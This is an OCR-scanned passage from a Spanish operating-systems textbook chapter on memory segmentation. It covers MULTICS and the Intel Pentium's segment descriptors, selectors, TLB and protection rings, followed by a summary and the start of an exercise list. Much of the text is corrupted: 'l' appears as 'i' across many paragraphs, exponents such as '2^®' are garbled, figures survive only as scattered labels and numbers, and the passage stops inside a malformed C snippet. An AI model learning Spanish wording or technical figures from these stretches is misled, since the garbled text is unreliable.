continuar debido a que hay demasiadas variables, pero esto no parece muy deportivo cuando se de¬ 
ja espacio sin usar en las otras tablas. 

Otra posibilidad es jugar a Robin Hood, tomando espacio de las tablas con exceso y dándolo a 
las tablas con poco espacio. Esta revoltura puede hacerse, pero es similar a cuando uno administra 
sus propios sobrepuestos: una molestia como mínimo y, en el peor de los casos, mucho trabajo te¬ 
dioso sin recompensas. 

Lo que se necesita realmente es una forma de liberar al programador de tener que administrar 
las tablas en expansión y contracción, de la misma forma que la memoria virtual elimina la preocu¬ 
pación de tener que organizar el programa en sobrepuestos. 

Una solución simple y en extremado general es proporcionar la máquina con muchos espacios 
de direcciones por completo independientes, llamados segmentos. Cada segmento consiste en una 
secuencia lineal de direcciones, desde 0 hasta cierto valor máximo. La longitud de cada segmento 
puede ser cualquier valor desde 0 hasta el máximo permitido. Los distintos segmentos pueden te¬ 
ner distintas longitudes (y por lo general así es). Además las longitudes de los segmentos pueden 
cambiar durante la ejecución. La longitud de un segmento depila puede incrementarse cada vez que 
se meta algo a la pila y decrementarse cada vez que se saque algo. 

Debido a que cada segmento constituye un espacio de direcciones separado, los distintos seg¬ 
mentos pueden crecer o reducirse de manera independiente, sin afectar unos a otros. Si una pila en 
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cierto segmento necesita más espacio de direcciones para crecer, puede tenerio, ya que no hay na¬ 
da más en su espacio de direcciones con io que se pueda topar. Desde iuego que un segmento se 
puede henar, pero por io generai ios segmentos son muy grandes, por io que esta ocurrencia es ra¬ 
ra. Para especificar una dirección en esta memoria segmentada o bidimensionai, ei programa debe 
suministrar una dirección en dos partes, un número de segmento y una dirección dentro dei segmen¬ 
to. La figura 3-32 iiustra ei uso de una memoria segmentada para ias tabias dei compiiador que vi¬ 
mos antes. Aquí se muestran cinco segmentos independientes. 



0 12 3 4 


Figura 3-32. U na memoria segmentada permite que cada tabla crezca o se reduzca de 
manera independiente a las otras tablas. 

Enfatizamos que un segmento es una entidad iógica, deiacuai ei programador está consciente 
y ia utiiiza como entidad iógica. Un segmento podría contener un procedimiento, o un arregio, o 
una piia, o una coiección de vari abies escaiares, pero por io generai no contiene una mezcia de dis¬ 
tintos tipos. 

Una memoria segmentada tiene otras ventajas además de simpiificar ei manejo de estructuras 
de datos que aumentan o reducen su tamaño. Si cada procedimiento ocupa un segmento separado, 
con ia dirección O como su dirección iniciai, ia vincuiación de procedimientos que se compiian por 
separado se simpiifica de manera considerabie. Después de que se han compiiado y vincuiado to¬ 
dos ios procedimientos que constituyen un programa, una iiamada ai procedimiento en ei segmen¬ 
to n utiiizará ia dirección en dos partes (n, 0) para direccionar ia paiabra 0 (ei punto de entrada). 

Si ei procedimiento en ei segmento n se modifica y recompiia posteriormente, no hay necesi¬ 
dad de cambiar ios demás procedimientos (ya que no se han modificado direcciones iniciai es), aun 
si ia nueva versión es más grande que ia anterior. Con una memoria unidimensionai, ios procedi¬ 
mientos se empaquetan estrechamente, uno ai iado dei otro, sin espacio de direcciones entre eiios. 
En consecuencia, ai cambiar ei tamaño de un procedimiento se puede afectar ia dirección iniciai de 
otros procedimientos (no reiacionados). Esto a su vez requiere ia modificación de todos ios proce- 
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dimientos que llamen a cualquiera de los procedimientos que se movieron, para poder incorporar 
sus nuevas direcciones iniciales. Si un programa contiene cientos de procedimientos, este proceso 
puede ser costoso. 

La segmentación también facilita la compartición de procedimientos o datos entre varios pro¬ 
cesos. Un ejemplo común es la biblioteca compartida. Las estaciones de trabajo modernas que ope¬ 
ran sistemas de ventanas avanzados tienen a menudo bibliotecas gráficas en extremo extensas que 
se compilan en casi todos los programas. En un sistema segmentado, la biblioteca gráfica se puede 
colocar en un segmento y varios procesos pueden compartirla, eliminando la necesidad de tenerla 
en el espacio de direcciones de cada proceso. Aunque también es posible tener bibliotecas compar¬ 
tidas en sistemas de paginación puros, es más complicado. En efecto, estos sistemas lo hacen me¬ 
diante la simulación de la segmentación. 

Como cada segmento forma una entidad lógica de la que el programador está consciente, co¬ 
mo un procedimiento, un arreglo o una pila, los distintos segmentos pueden tener diferentes tipos 
de protección. Un segmento de procedimiento se puede especificar como de sólo ejecución, para 
prohibir los intentos de leer de él o almacenar en él. Un arreglo de punto flotante se puede especi¬ 
ficar como de lectura/escritura pero no como de ejecución, y los intentos de saltar a él se atraparán. 
Dicha protección es útil para atrapar errores de programación. 

El lector debe tratar de comprender por qué la protección es sensible en una memoria segmen¬ 
tada, pero no en una memoria paginada unidimensionalmente. En una memoria segmentada, el 
usuario está consciente de lo que hay en cada segmento. Por lo general, un segmento no contendría 
un procedimiento y una pila, por ejemplo, sino uno o el otro, no ambos. Como cada segmento con¬ 
tiene sólo un tipo de objeto, puede tener la protección apropiada para ese tipo específico. La pagi¬ 
nación y la segmentación se comparan en la figura 3-33. 

El contenido de una página es, en cierto sentido, accidental. El programador ni siquiera está 
consciente del hecho de que está ocurriendo la paginación. A unque sería posible poner unos cuan¬ 
tos bits en cada entrada de la tabla de páginas para especificar el acceso permitido, para utilizar es¬ 
ta característica el programador tendría que llevar registro del lugar en el que se encontraran los 
límites de página en su espacio de direcciones. La paginación se inventó para eliminar precisamen¬ 
te ese tipo de administración. Como el usuario de una memoria segmentada tiene la ilusión de que 
todos los segmentos se encuentran en memoria principal todo el tiempo (es decir, que puede direc- 
cionarlos como si estuvieran) puede proteger cada segmento por separado sin tener que preocupar¬ 
se con la administración por tener que superponerlos. 


3.7.1 Implementación de segmentación pura 

La implementación de segmentación difiere de la paginación de una manera esencial: las páginas 
tienen un tamaño fijo y los segmentos no. La figura 3-34(a) muestra un ejemplo de una memoria fí¬ 
sica que al principio contiene cinco segmentos. A hora considere lo que ocurre si el segmento 1 se 
desaloja y el segmento 7, que es más pequeño, se coloca en su lugar. Obtendremos la configuración 
de memoria de la figura 3-34(b). Entre el segmento 7 y el 2 hay un área sin uso; es decir, un hue¬ 
co. Después el segmento 4 se reemplaza por el segmento 5, como en la figura 3-34(c), y el segmen¬ 
to 3 se reemplaza por el segmento 6, como en la figura 3-34(d). 
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Consideración 

Paginación 

Segmentación 

¿Necesita ei programador estar consciente 

de que se está utilizando esta técnica? 

No 

Sí 

¿Cuántos espacios de direcciones 

iineaies hay? 

1 

Muchos 

¿Puede ei espacio de direcciones totai 

exceder ai tamaño de ia memoria física? 

Sí 

Sí 

¿Pueden ios procedimientos y ios datos 

diferenciarse y protegerse por separado? 

No 

Sí 

¿Pueden ias tabias cuyo tamaño fiuctúa 

acomodarse con faciiidad? 

No 

Sí 

¿Se faciiita ia compartición de 

procedimientos entre usuarios? 

No 

Sí 

¿Por qué se inventó esta técnica? 

Para obtener un gran 

Para permitir a ios 


espacio de direcciones 

lineai sin tener que comprar 

más memoria física 

programas y datos 

dividirse en espacios de 

direcciones iógicamente inde¬ 
pendientes, ayudando a ia 

compartición y ia protección 


Figura 3-33. Comparación de la paginación y la segmentación. 


Una vez que el sistema haya estado en ejecución por un tiempo, la memoria se dividirá en un 
número de trozos, de los cuales algunos contendrán segmentos y otros huecos. Este fenómeno, lla¬ 
mado efecto de tablero de ajedrez o fragmentación externa, desperdicia memoria en los huecos. 
Se puede manejar mediante la compactación, como veremos en la figura 3-34(c). 

3.7.2 Segmentación con paginación: MULTICS 

Si los segmentos son extensos, puede ser inconveniente (o incluso imposible) mantenerlos comple¬ 
tos en memoria principal. Esto nos lleva a la idea de paginarlos, de manera que sólo las páginas que 
realmente se necesiten tengan que estar presentes. Varios sistemas importantes han soportado seg¬ 
mentos de páginas. En esta sección describiremos el primero: M ULTICS. En la siguiente analiza¬ 
remos uno más reciente: el Intel Pentium. 

M ULTICS operaba en las máquinas HoneyweII 6000 y sus descendientes: proveía a cada pro¬ 
grama con una memoria virtual de hasta 2^® segmentos (más de 250,000), cada uno de los cuales 
podría ser de hasta 65,536 palabras (36 bits) de longitud. Para implementar esto, los diseñadores de 
M ULTICS optaron por considerar a cada segmento como una memoria virtual y la paginaron, com- 
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Segmento 0 
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Figura 3-34. (a)-(d) Desarrollo del efecto de tablero de ajedrez, (e) Eliminación del 
efecto de tablero de ajedrez mediante la compactación. 


binando las ventajas de la paginación (tamaño de página uniforme y no tener que mantener todo el 
segmento en la memoria, si sólo se está utilizando parte de él) con las ventajas de la segmentación 
(facilidad de programación, modularidad, protección, compartición). 

Cada programa de M ULTICS tiene una tabla de segmentos, con un descriptor por segmento. 
Como hay en potencia más de un cuarto de millón de entradas en la tabla, la tabla de segmentos es 
en sí un segmento y se pagina. Un descriptor de segmentos contiene una indicación acerca de si el 
segmento está en memoria principal o no. Si cualquier parte del segmento está en memoria, se con¬ 
sidera que el segmento está en memoria y su tabla de páginas estará en memoria. Si el segmento es¬ 
tá en memoria, su descriptor contiene un apuntador de 18 bits a su tabla de páginas, como en la 
figura 3-35(a). Como las direcciones físicas son de 24 bits y las páginas se alinean en límites de 64 
bytes (implicando que los 6 bits de menor orden de las direcciones de página son 000000), sólo se 
necesitan 18 bits en el descriptor para almacenar una dirección de la tabla de páginas. El descriptor 
también contiene el tamaño del segmento, los bits de protección y unos cuantos elementos más. La 
figura 3-35(b) ilustra un descriptor de segmento de M ULTICS. La dirección del segmento en la me¬ 
moria secundaria no está en el descriptor de segmentos, sino en otra tabla utilizada por el maneja- 
dor de fallos de segmento. 

Cada segmento es un espacio de direcciones virtual ordinario y se pagina de la misma forma 
que la memoria paginada no segmentada descrita anteriormente en este capítulo. El tamaño normal 
de página es de 1024 palabras (aunque unos cuantos segmentos utilizados por M ULTICS en sí no 
están paginados o están paginados en unidades de 64 palabras para ahorrar memoria física). 

Una dirección en M ULTICS consiste en dos partes: el segmento y la dirección dentro del seg¬ 
mento. La dirección dentro del segmento se divide aún más en un número de página y en una pa¬ 
labra dentro de la página, como se muestra en la figura 3-36. Cuando ocurre una referencia a 
memoria, se lleva a cabo el siguiente algoritmo. 
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Tabla de páginas para el segmento 1 


(a) 


18 

9 

1 

1 

1 

3 

3 

Dirección de memoria principal 
de la tabla de páginas 

Longitud del seg¬ 
mento (en páginas) 



i 




Tamaño de página: 

0 = 1024 palabras - 

1 = 64 palabras 

0 = el segmento está paginado_ 

1 = el segmento no está paginado 

Bits varios - 

Bits de protección - 

(b) 

Figura 3-35. La memoria virtual deMULTICS. (a) El segmento del descriptor apun¬ 
ta a las tablas de páginas, (b) U n descriptor de segmento. Los números son las longi¬ 
tudes de los campos. 

1. El número de segmento se utiliza para encontrar el descriptor de segmentos. 

2. Se realiza una comprobación para ver si la tabla de páginas del segmento está en la memo¬ 
ria. Si la tabla de páginas está en memoria, se localiza. Si no, ocurre un fallo de segmento. 
Si hay una violación a la protección, ocurre un fallo (trap). 

3. La entrada en la tabla de páginas para la página virtual solicitada se examina. Si la pági¬ 
na en sí no está en memoria, se dispara un fallo de página. Si está en memoria, la direc- 
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ción de la memoria principal del inicio de la página se extrae de la entrada en la tabla de 
páginas. 

4. El desplazamiento se agrega al origen de la página para obtener la dirección de memoria 
principal en donde se encuentra la palabra. 

5. Finalmente se lleva a cabo la operación de lectura o almacenamiento. 

Dirección dentro 
dei segmento 


Número de segmento 
18 


Número 

Desplazamiento 

de página 

dentro de la página 

6 

10 


Figura 3-36. U na dirección virtual de M U LTICS de 34 bits. 


Este proceso se ilustra en la figura 3-37. Por simpleza, omitimos el hecho de que el mismo seg¬ 
mento del descriptor está paginado. Lo que ocurre en realidad es que se utiliza un registro (el regis¬ 
tro base del descriptor) para localizar la tabla de páginas del segmento del descriptor, que a su vez 
apunta a las páginas del segmento del descriptor. Una vez que se ha encontrado el descriptor para 
el segmento necesario, el direccionamiento procede como se muestra en la figura 3-37. 


Dirección virtual de MULTiCS 


Número de segmento 


Número 
de página 

Despiazamiento 


Número de 
segmento 



Despiazamiento 


Figura 3-37. Conversión de una dirección M U LTICS de dos partes en una dirección 
de memoria principal. 


Como sin duda habrá adivinado para estos momentos, si el sistema operativo llevara a cabo el 
algoritmo anterior en cada instrucción, los programas no se ejecutarían con mucha rapidez. En rea¬ 
lidad, el hardware de M U LTICS contiene un TLB de 16 palabras de alta velocidad que puede bus¬ 
car una llave dada en todas sus entradas en paralelo. Esto se ilustra en la figura 3-38. Cuando se 
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presenta una dirección a ia computadora, ei hardware de direccionamiento primero comprueba que 
i a dirección vi rtuai esté en eiTLB.Deser así, obtiene ei número dei marco de página directamen¬ 
te dei TL B y forma ia dirección actuai de ia paiabra referenciada sin tener que buscar en ei segmen¬ 
to dei descriptor o en ia tabia de páginas. 


Campo de ¿Está en 

comparación 

-^-, entrada? 

Número de Página Marco de 

segmento virtual página Protección Edad i 


4 

1 

7 

Lectura/escritura 

13 

1 

6 

0 

2 

Sólo lectura 

10 

1 

12 

3 

1 

Lectura/escritura 

2 

1 






0 

2 

1 

0 

Sólo ejecución 

7 

1 

2 

2 

12 

Sólo ejecución 

9 

1 








Figura 3-38. U na versión simplificada del TLB de M U LTICS. La existencia de dos ta¬ 
maños de página hace que el TLB real sea más complicado. 


Las direcciones de i as 16 páginas con referencia más reciente se mantienen en ei TLB. Los 
programas cuyo conjunto de trabajo sea menor que ei tamaño dei TLB se equiiibrarán con i as di¬ 
recciones de todo ei conjunto de trabajo en ei TLB, y por io tanto se ejecutarán con eficiencia. Si 
ia página no está en ei TLB, se hace referencia ai descriptor y ias tabias de páginas para encontrar ia 
dirección dei marco, ei TLB seactuaiiza para inciuir esta página, y ia página de uso menos recien¬ 
te se descarta. Ei campo edad iieva ei registro de cuái entrada es ia de uso menos reciente. La ra¬ 
zón de usar un TLB es para comparar ios números de segmento y de página de todas ias entradas 
en paraieio. 

3.7.3 Segmentación con paginación: Intel Pentium 

La memoria vi rtuai en ei Pentium se asemeja en muchas formas a M ULTICS, inciuyendo i a presen¬ 
cia de segmentación y paginación. M ientras que M ULTICS tiene 256K segmentos independientes, 
cada uno con hasta 64K paiabras de 36 bits, ei Pentium tiene 16K segmentos independientes, cada 
uno de ios cuaies contiene hasta un mi i mi i iones de paiabras de 32 bits. A unque hay menos segmen¬ 
tos, entre mayor sea ei tamaño dei segmento será más importante, ya que pocos programas necesi¬ 
tan más de 1000 segmentos, pero muchos programas necesitan segmentos extensos. 

Ei corazón de ia memoria virtuai dei Pentium consiste en dos tabias, ñamadas LDT (Locai 
Descriptor Tabie, Tabia de descriptores iocaies) y GDT (G iobai Descriptor Tabie, Tabia de descrip- 
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tores globales). Cada programa tiene su propia LDT, pero hay una soia GDT compartida por todos 
ios programas en ia computadora. La LDT describe ios segmentos iocaies para cada programa, in- 
ciuyendo su código, datos, piia, etcétera, mientras que ia GDT describe ios segmentos dei sistema, 
inciuyendo ei sistema operativo en sí. 

Para acceder a un segmento, un programa dei Pentium primero carga un seiector para ese seg¬ 
mento en uno de ios seis registros de segmento de ia máquina. Durante ia ejecución, ei registro CS 
contiene ei seiector para ei segmento de código y ei registro DS contiene ei seiector para ei segmen¬ 
to de datos. Los demás registros de segmento son menos importantes. Cada seiector es un número 
de 16 bits, como se muestra en ia figura 3-39. 


Bits 13 1 2 


índice 

-- ^ 

O = GDT/1 = LDT Nivei de priviiegio (O a 3) 

Figura 3-39. U n selector del Pentium. 


Uno de ios bits dei seiector indica si ei segmento es iocai o giobai (es decir, si está en ia LDT 
o en ia GDT). Otros trece bits especifican ei número de entrada en ia LDT o GDT, por io que estas 
tabias están restringidas a contener cada una 8K descriptores de segmento. Los otros 2 bits que se 
reiacionan con ia protección se describen más adeiante. Ei descriptor 0 está prohibido. Puede car¬ 
garse de manera segura en un registro de segmento para indicar que ei registro de segmento no es¬ 
tá disponibie en un momento dado. Produce un trap si se utiiiza. 

Ai momento en que se carga un seiector en un registro de segmento, ei descriptor correspon¬ 
diente se obtiene de ia LDT o GDT y seaimacena en registros de microprograma, por io que se pue¬ 
de acceder con rapidez. Como se iiustra en ia figura 3-40, un descriptor consiste de 8 bytes, 
inciuyendo ia dirección base dei segmento, su tamaño y demás información. 

Ei formato dei seiector se ha eiegido con inteiigencia para faciiitar ia iocaiización dei des¬ 
criptor. Primero se seiecciona ia LDT o GDT, con base en ei bit 2 dei seiector. Después ei seiec¬ 
tor se copia a un registro temporai interno, y ios 3 bits de menor orden se estabiecen en 0. Por 
úitimo, se ie suma ia dirección de ia tabia LDT o GDT para proporcionar un apuntador ai des¬ 
criptor. Por ejempio, ei seiector 72 se refiere a ia entrada 9 en ia GDT, que se encuentra en ia di¬ 
rección GDT -L 72. 

Vamos a rastrear ios pasos mediante ios cuaies un par (seiector, despiazamiento) se convierte 
en una dirección física. Tan pronto como ei microprograma sabe cuái registro de segmento se está 
utiiizando, puede encontrar ei descriptor compieto que corresponde a ese seiector en sus registros 
internos. Si ei segmento no existe (seiector 0) o en ese momento se paginó para sacado de memo¬ 
ria, se produce un trap. 

Después, ei hardware utiiiza ei campo Límite para comprobar si ei despiazamiento está más aiiá 
dei finai dei segmento, en cuyo caso también se produce un trap. Lógicamente debería haber un 
campo de 32 bits en ei descriptor para proporcionar ei tamaño dei segmento, pero sóio hay 20 bits 
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0: Segmento de 16 bits L 
1: Segmento de 32 bits J 


f 0: Ei segmento no está en memoria 
1: Ei segmento está en la memoria 


0: Li está en bytes 1 
1: Li está en páginas] 


Nivel de privilegio (0 a 3) 

0: Sistema 
1: Aplicación 

Tipo y protección del segmento 


Base 24 a 31 

G 

D 

0 


Límite 

16a19 

P 

DPL 

S 

Tipo 

Base 16 a 23 

Base 0 a 15 

Límite 0 a 15 


- 32 Bits - 


4 

0 

Dirección 

relativa 


Figura 3-40. Descriptor del segmento de código del Pentium. Los segmentos de datos 
difieren un poco. 


disponibles, por lo que se utiliza un esquema distinto. Si el campo G bit (granularidad) esO, el cam¬ 
po Límite es el tamaño de segmento exacto, hasta 1 M B. Si es 1, el campo Límite proporciona el ta¬ 
maño del segmento en páginas, en vez de bytes. El tamaño de página del Pentium está fijo en 4 KB, 
por lo que 20 bits son suficientes para segmentos de hasta 2^^ bytes. 

Suponiendo que el segmento está en memoria y que el desplazamiento está en el rango, el Pen¬ 
tium suma el campo Base de 32 bits en el descriptor al desplazamiento para formar lo que se cono¬ 
ce como una dirección iineai, como se muestra en la figura 3-41. El campo Base se divide en tres 
partes y se esparce por todo el descriptor para tener compatibilidad con el 286, en donde el campo 
Base sólo tiene 24 bits. En efecto, el campo Base permite que cada segmento empiece en un lugar 
arbitrario dentro del espacio de direcciones lineal de 32 bits. 



Figura 3-41. Conversión de un par (seiector, despiazamiento) en una dirección iineai. 

Si se deshabilita la paginación (mediante un bit en un registro de control global), la dirección 
lineal se interpreta como la dirección física y se envía a la memoria para la lectura o escritura. Por 
ende, con la paginación deshabilitada tenemos un esquema de segmentación pura, en donde la di¬ 
rección base de cada segmento se proporciona en su descriptor. No se evita que los segmentos se 
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traslapen, probablemente debido a que sería demasiado probiema y se requeriría mucho tiempo pa¬ 
ra verificar que todos estuvieran disjuntos. 

Por otro iado, si ia paginación está habiiitada, ia dirección iineai se interpreta como una direc¬ 
ción virtuai y se asigna a ia dirección física usando tabias de páginas, en forma muy parecida a ios 
ejempios anteriores. La única compiicación verdadera es que con una dirección virtuai de 32 bits y 
una página de 4 KB, un segmento podría contener 1 miiión de páginas, por io que se utiiiza una 
asignación de dos niveies para reducir ei tamaño de ia tabia de páginas para segmentos pequeños. 

Cada programa en ejecución tiene un directorio de páginas que consiste de 1024 entradas de 
32 bits. Se encuentra en una dirección a ia que apunta un registro giobai. Cada entrada en este di¬ 
rectorio apunta a una tabia de páginas que también contiene 1024 entradas de 32 bits. Las entradas 
en ia tabia de páginas apuntan a marcos de página. Ei esquema se muestra en ia figura 3-42. 


Dirección iineai 


Bits 1 o 


10 


12 


Dir 


Página 


Desplazamiento 


(a) 

Directorio de páginas Tabla de páginas Marco de página 

i 


1024 I 
entradas! 

Dir 


La entrada en La entrada en la 

el directorio apunta tabla de páginas 

a la tabla de páginas apunta a la palabra 

(b) 

Figura 3-42. Asociación de una dirección lineal a una dirección física. 

En ia figura 3-42(a) podemos ver una dirección iineai dividida en tres campos: Dir, Página y 
Despiazamiento. Ei campo Dir se utiiiza para indexar en ei directorio de páginas y iocaiizar un 
apuntador a ia tabia de páginas apropiada. Después se utiiiza ei campo Página como un índice en 
ia tabia de páginas para buscar ia dirección física dei marco de página. Por úitimo, Despiazamien¬ 
to se suma a ia dirección dei marco de página para obtener ia dirección física dei byteo paiabra re¬ 
querida. 

Las entradas en ia tabia de páginas son de 32 bits cada una, 20 de ias cuaies contienen un nú¬ 
mero de marco de página. Los bits restantes contienen bits de acceso y bits sucios, estabiecidos por 
ei hardware para ei beneficio dei sistema operativo, bits de protección y otros bits utiiitarios. 

Cada tabia de páginas tiene entradas para 1024 marcos de página de 4 KB, por io que una so- 
ia tabia de páginas maneja 4 megabytes de memoria. U n segmento menor de 4M tendrá un directo- 
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rio de páginas con una soia entrada: un apuntador a su única tabia de páginas. De esta manera, ia 
sobrecarga por ios segmentos cortos es sóio de dos páginas, en vez dei miiión de páginas que se ne¬ 
cesitarían en una tabia de páginas de un nivei. 

Para evitar reaiizar referencias repetidas a memoria, ei Pentium (ai iguai que M ULTICS) tiene 
un pequeño TLB que asigna directamente ias combinaciones Dir-Página de uso más reciente a ia 
dirección física dei marco de página. Sóio cuando ia combinación actuai no está presente en ei TLB 
es cuando se iieva a cabo ei mecanismo de ia figura 3-42 y se actuaiiza ei TLB. M ientras ios fraca¬ 
sos dei TLB sean raros, ei rendimiento será bueno. 

También vaie ia pena observar que si aiguna apiicación no necesita segmentación pero está 
contenta con un soio espacio de direcciones paginado de 32 bits, ese modeio es posibie. Todos ios 
registros de segmento se pueden estabiecer con ei mismo seiector, cuyo descriptor tiene Base = 0 
y Límite estabiecido ai máximo. Entonces ei despiazamiento de ia instrucción será ia dirección ii- 
neai, con sóio un espacio de direcciones único utiiizado, en efecto, una paginación normai. De he¬ 
cho, todos ios sistemas operativos actuaies para ei Pentium funcionan de esta manera. OS/2 fue ei 
único que utiiizó todo ei poder de ia arquitectura Intei M M U. 

Con todo, hay que dar crédito a ios diseñadores dei Pentium. Dadas ias metas confiictivas por 
impiementar ia paginación pura, ia segmentación pura y ios segmentos paginados, ai tiempo que 
debía ser compatibie con ei 286, y todo esto había que hacerio con eficiencia. Ei diseño resuitante 
es sorprendentemente simpie y iimpio. 

Aunque hemos cubierto en forma breve ia arquitectura compieta de ia memoria virtuai dei Pen¬ 
tium, vaie ia pena decir unas cuantas paiabras acerca de ia protección, ya que este tema está estre¬ 
chamente reiacionado con ia memoria virtuai. Ai iguai que ei esquema de memoria virtuai está 
modeiado en forma muy parecida a M ULTICS, el sistema de protección también lo está. El Pen¬ 
tium admite cuatro niveles de protección, donde el nivel 0 es el más privilegiado y el 3 el menos 
privilegiado. Éstos se muestran en la figura 3-43. En cada instante, un programa en ejecución se en¬ 
cuentra en cierto nivel, indicado por un campo de 2 bits en su PSW. Cada segmento en el sistema 
también tiene un nivel. 

M ientras que un programa se restrinja a sí mismo a utilizar segmentos en su propio nivel, todo 
funcionará bien. Se permiten los intentos de acceder a los datos en un nivel más alto, pero los de 
acceder a los datos en un nivel inferior son ilegales y producen traps. Los intentos de llamar proce¬ 
dimientos en un nivel distinto (mayor o menor) se permiten, pero de una manera controlada cuida¬ 
dosamente. Para realizar una llamada entre niveles, la instrucción CALL debe contener un selector 
en vez de una dirección. Este selector designa a un descriptor llamado compuerta de llamada, el 
cual proporciona la dirección del procedimiento al que se va a llamar. Por ende, no es posible sal¬ 
tar en medio de un segmento de código arbitrario en un nivel distinto. Sólo se pueden utilizar pun¬ 
tos de entrada oficiales. Los conceptos de los niveles de protección y las compuertas de llamada se 
utilizaron por primera vez en M ULTICS, en donde se denominaron anillos de protección. 

Un uso común para este mecanismo se sugiere en la figura 3-43. En el nivel 0 encontramos el 
kernel del sistema operativo, que se encarga de la E/S, la administración de memoria y otras cues¬ 
tiones críticas. En el nivel 1 está presente el manejador de llamadas al sistema. Los programas de 
usuario pueden llamar procedimientos aquí para llevar a cabo las llamadas al sistema, pero sólo se 
puede llamar a una lista de procedimientos específicos y protegidos. El nivel 2 contiene procedi¬ 
mientos de biblioteca, posiblemente compartida entre muchos programas en ejecución. Los progra- 
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mas de usuario pueden llamar a estos procedimientos y leer sus datos, pero no pueden modificar¬ 
los. Por último, los programas de usuario se ejecutan en nivel 3, que tiene la menor protección. 

Los traps y las interrupciones utilizan un mecanismo similar a las compuertas de llamadas. 
También hacen referencia a los descriptores en vez de direcciones absolutas, y estos descriptores 
apuntan a los procedimientos específicos que se van a ejecutar. El campo Tipo en la figura 3-40 in¬ 
dica las diferencias entre los segmentos de código, los segmentos de datos y los diversos tipos de 
compuertas. 


3.8 INVESTIGACIÓN ACERCA DE LA ADMINISTRACIÓN 
DE MEMORIA 

La administración de memoria, en especial los algoritmos de paginación, fue alguna vez un área 
fructífera para la investigación, pero la mayor parte de eso parece haber desaparecido desde hace 
mucho tiempo, por lo menos para los sistemas de propósito general. La mayoría délos sistemas rea¬ 
les tienden a utilizar cierta variación sobre el reloj, debido a que es fácil de implementar y relativa¬ 
mente efectivo. Sin embargo, una excepción reciente es un rediseño del sistema de memoria virtual 
de BSD 4.4 (Cranor y Prulkar, 1999). 

Sin embargo, aún se están realizando investigaciones sobre la paginación en los tipos más re¬ 
cientes de sistemas. Por ejemplo, los teléfonos celulares y losPDAssehan convertido en pequeñas 
PCs y muchps de ellas paginan la RAM al "disco", sólo que el disco en un teléfono celular es la 
memoria flash, que tiene propiedades distintas a las de un disco magnético giratorio. Cierto traba¬ 
jo reciente se reporta (In y colaboradores, 2007; joo y colaboradores, 2006; y Park y colaborado¬ 
res, 2004a). Park y colaboradores (2004b) también han analizado la paginación por demanda 
consciente de la energía en los dispositivos móviles. 
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También se están realizando investigaciones acerca del modelado del rendimiento de la pagi¬ 
nación (Albersy colaboradores, 2002; Burton y Kelly, 2003; Cascaval y colaboradores, 2005; Pa- 
nagiotou y Souza, 2006; y Peserico, 2003). También es de interés la administración de memoria 
para los sistemas multimedia (Dasigenis y colaboradores, 2001; Hand, 1999) y los sistemas de tiem¬ 
po real (Pizio y Vitek, 2006). 


3.9 RESUMEN 

En este capítulo examinamos la administración de memoria. Vimos que los sistemas más simples 
no realizan intercambios ni paginaciones. Una vez que se carga un programa en la memoria, per¬ 
manece ahí hasta que termina. Algunos sistemas operativos sólo permiten un proceso a la vez en la 
memoria, mientras que otros soportan la multiprogramación. 

El siguiente paso es el intercambio. Cuando se utiliza esta técnica, el sistema puede manejar 
más procesos de los que puede alojar en la memoria. Los procesos para los cuales no haya espacio 
se intercambian hacia el disco. Se puede llevar el registro del espacio libre en la memoria y en el 
disco con un mapa de bits o una lista de huecos. 

A menudo, las computadoras modernas tienen cierta forma de memoria virtual. En su forma 
más simple, el espacio de direcciones de cada proceso se divide en bloques de tamaño uniforme lla¬ 
mados páginas, que pueden colocarse en cualquier marco de página disponible en la memoria. Hay 
muchos algoritmos de reemplazo de páginas: dos délos mejores algoritmos son el de envejecimien¬ 
to y WSCIock. 

Para modelarlos sistemas de paginación hay que abstraer la cadena de referencia de página del 
programa y utilizar la misma cadena de referencia con distintos algoritmos. Estos modelos se pue¬ 
den utilizar para hacer algunas predicciones acerca del comportamiento de la paginación. 

Para hacer que los sistemas de paginación funcionen bien, no basta con elegir un algoritmo: 
hay que poner atención en cuestiones tales como determinar el conjunto de trabajo, la política de 
asignación de memoria y el tamaño de página. 

La segmentación ayuda a manejar las estructuras de datos que pueden cambiar de tamaño du¬ 
rante la ejecución, y simplifica la vinculación y la compartición. También facilita la provisión de 
distintos tipos de protección para distintos segmentos. Algunas veces la segmentación y la pagina¬ 
ción se combinan para proporcionar una memoria virtual bidimensional. El sistema M ULTICS y el 
Intel Pentium soportan segmentación y paginación. 


PROBLEMAS 

1 . En la figura 3-3 los registros base y límite contienen el mismo valor, 16,384. ¿Es esto un accidente, 
o siempre son iguales? Si esto es sólo un accidente, ¿por qué son iguales en este ejemplo? 

2 . U n sistema de intercambio elimina huecos mediante la compactación. Suponiendo una distribución 
aleatoria de muchos huecos y muchos segmentos de datos y un tiempo de lectura o escritura en una 
palabra de memoria de 32 bits de 10 nseg, ¿aproximadamente cuánto tiempo se requiere para com¬ 
pactar 128 M B? Para simplificar, suponga que la palabra 0 es parte de un hueco y que la palabra 
más alta en la memoria contiene datos válidos. 
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3 . En este problema tiene que comparar el almacenamiento necesario para llevar la cuenta de la memo¬ 
ria libre, utilizando un mapa de bits contra el uso de una lista ligada. La memoria de 128 M B se asig¬ 
na en unidades de n bytes. Para la lista enlazada, suponga que la memoria consiste en una secuencia 
alternante de segmentos y huecos, cada uno de64 KB. Suponga también que cada nodo en la lista 
enlazada necesita una dirección de memoria de 32 bits, una longitud de 16 bits y un campo para el 
siguiente nodo de 16 bits. ¿Cuánto bytes de almacenamiento se requieren para cada método? ¿Cuál 
es mejor? 

4. Considere un sistema de intercambio en el que la memoria consiste en los siguientes tamaños de hue¬ 
co, por orden de memoria: 10 KB, 4 KB, 20 KB, 18 KB, 7 KB, 9 KB, 12 KB y 15 KB. ¿Cuál hue¬ 
co se toma para las siguientes solicitudes de segmento sucesivas: 

a) 12 KB 

b) 10 KB 

c) 9 KB 

para el algoritmo del primer ajuste? Ahora repita la pregunta para el mejor ajuste, peor ajuste y si¬ 
guiente ajuste. 

5. Para cada una de las siguientes direcciones virtuales decimales, calcule el número de página virtual 
y desplazamiento para una página de 4 K B y para una página de 8 K B: 20000, 32768, 60000. 

6. El procesador Intel 8086 no admite memoria virtual. Sin embargo, algunas compañías vendían an¬ 
teriormente sistemas que contenían una CPU 8086 sin modificaciones y realizaba la paginación. 
Trate de llegar a una conclusión lógica acerca de cómo lo hicieron. Sugerencia: piense acerca de la 
ubicación lógica de la M M U. 

7. Considere el siguiente programa en C: 
intXINj; 

int paso = M : // M es una constante predefinida 
